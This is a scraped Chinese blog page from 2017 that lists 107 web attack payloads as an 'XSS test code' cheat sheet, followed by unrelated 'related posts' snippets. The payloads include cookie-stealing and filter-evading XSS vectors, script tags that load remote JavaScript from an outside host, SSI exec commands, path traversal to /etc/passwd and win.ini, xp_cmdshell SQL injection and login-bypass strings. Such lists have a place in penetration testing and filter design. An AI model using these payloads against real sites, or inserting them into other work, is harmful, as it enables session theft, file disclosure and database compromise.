XSS跨站測試代碼大全

阿新 • • 發佈：2017-09-01

exp div xss document back function -i index mes

  1 ‘><script>alert(document.cookie)</script>
  2 =‘><script>alert(document.cookie)</script>
  3 <script>alert(document.cookie)</script>
  4 <script>alert(vulnerable)</script>
  5 %3Cscript%3Ealert(‘XSS‘)%3C/script%3E
  6 <script>alert(‘XSS‘)</script>
  7 
 <img src="javascript:alert(‘XSS‘)">
  8 %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  9 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 10 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 11 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 12 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 
 13 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 14 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 15 %3f.jsp
 16 %3f.jsp
 17 <script>alert(‘Vulnerable‘);</script>
 18 <script>alert(‘Vulnerable‘)</script>
 19 ?sql_debug=1
 20 a%5c.aspx
 21 a.jsp/<script>alert(‘ 
Vulnerable‘)</script>
 22 a/
 23 a?<script>alert(‘Vulnerable‘)</script>
 24 "><script>alert(‘Vulnerable‘)</script>
 25 ‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&
 26 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 27 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 28 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 29 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
 30 http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
 31 ..\..\..\..\..\..\..\..\windows\system.ini
 32 \..\..\..\..\..\..\..\..\windows\system.ini
 33 ‘‘;!--"<XSS>=&{()}
 34 <IMG src="javascript:alert(‘XSS‘);">
 35 <IMG src=javascript:alert(‘XSS‘)>
 36 <IMG src=JaVaScRiPt:alert(‘XSS‘)>
 37 <IMG src=JaVaScRiPt:alert("XSS")>
 38 <IMG src=javascript:alert(‘XSS‘)>
 39 <IMG src=javascript:alert(‘XSS‘)>
 40 <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 41 <IMG src="jav ascript:alert(‘XSS‘);">
 42 <IMG src="jav ascript:alert(‘XSS‘);">
 43 <IMG src="jav ascript:alert(‘XSS‘);">
 44 "<IMG src=java\0script:alert(\"XSS\")>";‘ > out
 45 <IMG src=" javascript:alert(‘XSS‘);">
 46 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 47 <BODY BACKGROUND="javascript:alert(‘XSS‘)">
 48 <BODY ONLOAD=alert(‘XSS‘)>
 49 <IMG DYNSRC="javascript:alert(‘XSS‘)">
 50 <IMG LOWSRC="javascript:alert(‘XSS‘)">
 51 <BGSOUND src="javascript:alert(‘XSS‘);">
 52 <br size="&{alert(‘XSS‘)}">
 53 <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 54 <LINK REL="stylesheet" href="javascript:alert(‘XSS‘);">
 55 <IMG src=‘vbscript:msgbox("XSS")‘>
 56 <IMG src="mocha:[code]">
 57 <IMG src="livescript:[code]">
 58 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘XSS‘);">
 59 <IFRAME src=javascript:alert(‘XSS‘)></IFRAME>
 60 <FRAMESET><FRAME src=javascript:alert(‘XSS‘)></FRAME></FRAMESET>
 61 <TABLE BACKGROUND="javascript:alert(‘XSS‘)">
 62 <DIV STYLE="background-image: url(javascript:alert(‘XSS‘))">
 63 <DIV STYLE="behaviour: url(‘http://www.how-to-hack.org/exploit.html‘);">
 64 <DIV STYLE="width: expression(alert(‘XSS‘));">
 65 <STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>
 66 <IMG STYLE=‘xss:expre\ssion(alert("XSS"))‘>
 67 <STYLE TYPE="text/javascript">alert(‘XSS‘);</STYLE>
 68 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(‘XSS‘)");}</STYLE><A class="XSS"></A>
 69 <STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>
 70 <BASE href="javascript:alert(‘XSS‘);//">
 71 getURL("javascript:alert(‘XSS‘)")
 72 a="get";b="URL";c="javascript:";d="alert(‘XSS‘);";eval(a+b+c+d);
 73 <XML src="javascript:alert(‘XSS‘);">
 74 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(‘XSS‘);}</SCRIPT><"
 75 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 76 <IMG src="javascript:alert(‘XSS‘)"
 77 <!--#exec cmd="/bin/echo ‘<SCRIPT SRC‘"--><!--#exec cmd="/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>‘"-->
 78 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 79 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 80 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 81 <SCRIPT a=">" ‘‘ src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 82 <SCRIPT "a=‘>‘" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 83 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 84 <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
 85 admin‘--
 86 ‘ or 0=0 --
 87 " or 0=0 --
 88 or 0=0 --
 89 ‘ or 0=0 #
 90 " or 0=0 #
 91 or 0=0 #
 92 ‘ or ‘x‘=‘x
 93 " or "x"="x
 94 ‘) or (‘x‘=‘x
 95 ‘ or 1=1--
 96 " or 1=1--
 97 or 1=1--
 98 ‘ or a=a--
 99 " or "a"="a
100 ‘) or (‘a‘=‘a
101 ") or ("a"="a
102 hi" or "a"="a
103 hi" or 1=1 --
104 hi‘ or 1=1 --
105 hi‘ or ‘a‘=‘a
106 hi‘) or (‘a‘=‘a
107 hi") or ("a"="a[/code]

XSS跨站測試代碼大全

exp div xss document back function -i index mes 1 ‘><script>alert(document.cookie)</script> 2 =‘><script>ale

【安全測試】Web應用安全之XSS跨站指令碼攻擊漏洞相關

閱讀目錄歡迎轉載，也請註明出處：http://www.cnblogs.com/Detector/p/8811216.html 謝謝！前言以前都只是在各類文件中見到過XSS，也進行過相關的學習，但是都是一知半解，過了一段時間就忘了。前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞

【安全測試】Web應用安全之XSS跨站指令碼攻擊漏洞

前言以前都只是在各類文件中見到過XSS，也進行過相關的學習，但是都是一知半解，過了一段時間就忘了。前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞》的報告文件，來源是一個叫漏洞盒子的機構，看它的官方介紹，是一個網際網路安全測試眾測平臺。第一次在實際工作中遇到相關的問題，所以決定再系統的

第4次作業類測試代碼+105032014045+楊銘河

rfi color too efi rgs text blog ace val 1、類圖： 2、代碼：（1）計算類： class Arithmetic{　　//邏輯計算類 private int headphoneNum; private int

第4次作業類測試代碼+019+李悅洲

stack app static jlabel field ted temp 函數 private 類圖：代碼： package swingDesign; import java.awt.EventQueue; import javax.swing.JFra

第四次作業測試代碼+018+李濱

double adapt scan 類圖 handle 作業 () || != 一、類圖二、代碼 import java.util.Scanner; public class homeWork01 { public static String triangle(S

自動化測試代碼註釋規範

online *** drive 成員文檔自動生成 pan studio stl get 原文鏈接：http://www.cnblogs.com/zishi/p/6857606.html 一、頁頭加入代碼說明塊，格式如下： /******************

Android : 獲取聲卡信息的測試代碼

was lis mut config xpl bili bit fix bre 完整的編譯包（android平臺）：　　鏈接：http://pan.baidu.com/s/1qXMTT7I 　　密碼：2bow /* * ALSA parameter test progr

測試代碼

oba python true logs font brush blog 腳本 == __name__模塊被當做腳本執行時，__name__ = ‘__main__‘ 模塊被當做模塊導入時，__name__= 模塊名利用這種模式可以將測試代碼放入如下模式中，則只有在模塊自

Python 編寫通過post方式提交的接口測試代碼

urlencode nco 出現第一次用 python 方式 pen 沒有 iterable 第一次用python編寫程序是照著視頻裏編寫的但是期間也出現了很多錯誤視頻內用了是Python2 版本的而我的是python 3版本的寫這兩程序時就發現有很多不同

網頁特殊符號HTML代碼大全

表示 ron htm nbsp omega del mil 小於號標記 HTML特殊字符編碼大全：往網頁中輸入特殊字符，需在html代碼中加入以&開頭的字母組合或以&#開頭的數字。下面就是以字母或數字表示的特殊符號大全。

《xss跨站腳本剖析與防禦》實驗筆記

() 技術分享 ges image tro 漏洞 cnblogs xss漏洞 lis 1、書籍《xss跨站腳本剖析與防禦》上介紹的xss測試代碼 <img src="javascrpt:alert(‘xss‘);">， <table background

基於webrtc的媒體庫測試代碼以及接口介紹

需求技術分享 ebr pos 問題 -m white space 版本號經過一段時間的項目驗證，第一版接口能夠定版了。滿足一般的項目需求是沒有問題了，接口非常清晰，凝視也寫的非常清晰，大家有須要的就拿去測試吧，android版本號還在驗證中。假設有什麽問題或者須要源

JS性能分析（測試代碼運行時間）

code ons 性能分析 style 代碼 div 時間 ++ {} //性能優化 console.time("timer"); for(var i=0;i<10000;i++){} console.timeEnd("timer"); JS性能分析

node.js測試代碼

終端 tex require nbsp resp 發送頭部 lai nod var http = require(‘http‘); http.createServer(function (request, response) { // 發送 HTT

CSS 顏色代碼大全

eight tle ghost pin azure mar ldl www net CSS顏色代碼大全 FFFFFF #DDDDDD #AAAAAA #888888 #666666 #444444 #000000 #FFB7DD #FF88C2

編譯與運行測試代碼步驟

所在 eclipse adb push tomat -1 測試技術分享增加版本一、代碼寫完後開始對代碼進行編譯和執行，步驟如下：創建build文件-->修改build文件-->開始編譯-->push文件-->運行測試二、具體執行步驟如下：1

自學Java測試代碼

wan 二維數組 ted eth args bin -- pac blog 2017-08-22 21:23:37、 writer：pprp package test; public class helloWorld { int maxn = 123;

JAVA覆寫Request過濾XSS跨站腳本攻擊

getpara header term implement nbsp super exceptio stream elements 註：本文非本人原著。 demo的地址：鏈接:http://pan.baidu.com/s/1miEmHMo 密碼:k5ca 如何過濾

WAF——針對Web應用發起的攻擊，包括但不限於以下攻擊類型：SQL註入、XSS跨站、Webshell上傳、命令註入、非法HTTP協議請求、非授權文件訪問等

授權文件訪問 http協議火墻針對 str sql 包括 fire 核心概念 WAF Web應用防火墻（Web Application Firewall），簡稱WAF。 Web攻擊針對Web應用發起的攻擊，包括但不限於以下攻擊類型：SQL註入、XSS跨站、Websh

XSS跨站測試代碼大全

相關推薦